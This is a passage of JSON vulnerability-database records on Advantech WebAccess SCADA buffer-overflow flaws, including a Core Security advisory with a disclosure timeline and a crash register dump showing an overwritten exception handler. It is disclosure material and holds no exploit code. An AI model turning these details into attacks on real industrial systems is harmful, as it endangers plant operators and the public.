"https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0989", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05419", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d27e0c96-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68482", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0989", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0989", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05419", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-736", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68482", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "VULHUB", "id": "VHN-68482" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "CNNVD", "id": "CNNVD-201409-736" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the AccessCode2 parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0989" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "BID", "id": "69534" }, { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68482" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0989", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.1 }, { "db": "BID", "id": "69534", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-736", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2014-05419", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-004356", "trust": 0.8 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "D27E0C96-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68482", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "VULHUB", "id": "VHN-68482" }, { "db": "BID", "id": "69534" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-736" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "id": "VAR-201409-0443", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "VULHUB", "id": "VHN-68482" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" } ] }, "last_update_date": "2024-11-23T22:38:56.168000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05419)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53295" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "CNNVD", "id": "CNNVD-201409-736" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68482" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69534" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0989" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0989" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "VULHUB", "id": "VHN-68482" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-736" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05419" }, { "db": "VULHUB", "id": "VHN-68482" }, { "db": "BID", "id": "69534" }, { "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-736" }, { "db": "NVD", "id": "CVE-2014-0989" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05419" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68482" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69534" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-736" }, { "date": "2014-09-20T10:55:04.120000", "db": "NVD", "id": "CVE-2014-0989" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05419" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68482" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69534" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004356" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-736" }, { "date": "2024-11-21T02:03:10.313000", "db": "NVD", "id": "CVE-2014-0989" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-736" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004356" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d27e0c96-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-736" } ], "trust": 0.8 } }
var-201708-1703
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within bwocxrun.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-536", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-536", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within bwocxrun.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4094", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-536", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ] }, "id": "VAR-201708-1703", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:57.629000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\5C2A52BD-2250-4F6B-A4D2-D1D00FCD748CIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-536", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-536", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-536", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess bwocxrun OpenUrlToBufferTimeout Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-536" } ], "trust": 0.7 } }
var-202005-0311
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed. Advantech WebAccess Node Exists in a past traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000521e in DATACORE.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.9, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d" }, { "db": "IVD", "id": "19380447-9612-4180-8a2e-efbd7ba08404" }, { "db": "ZDI", "id": "ZDI-20-598" }, { "db": "CNVD", "id": "CNVD-2020-27432" }, { "db": "VULMON", "id": "CVE-2020-12022" }, { "db": "JVNDB", "id": "JVNDB-2020-005146" }, { "db": "NVD", "id": "CVE-2020-12022" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005146" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-598" } ], "trust": 0.7 }, "cve": "CVE-2020-12022", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12022", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005146", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-27432", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "6265122d-0d35-44b3-85ea-0c5f7b711a0d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "19380447-9612-4180-8a2e-efbd7ba08404", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164659", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", 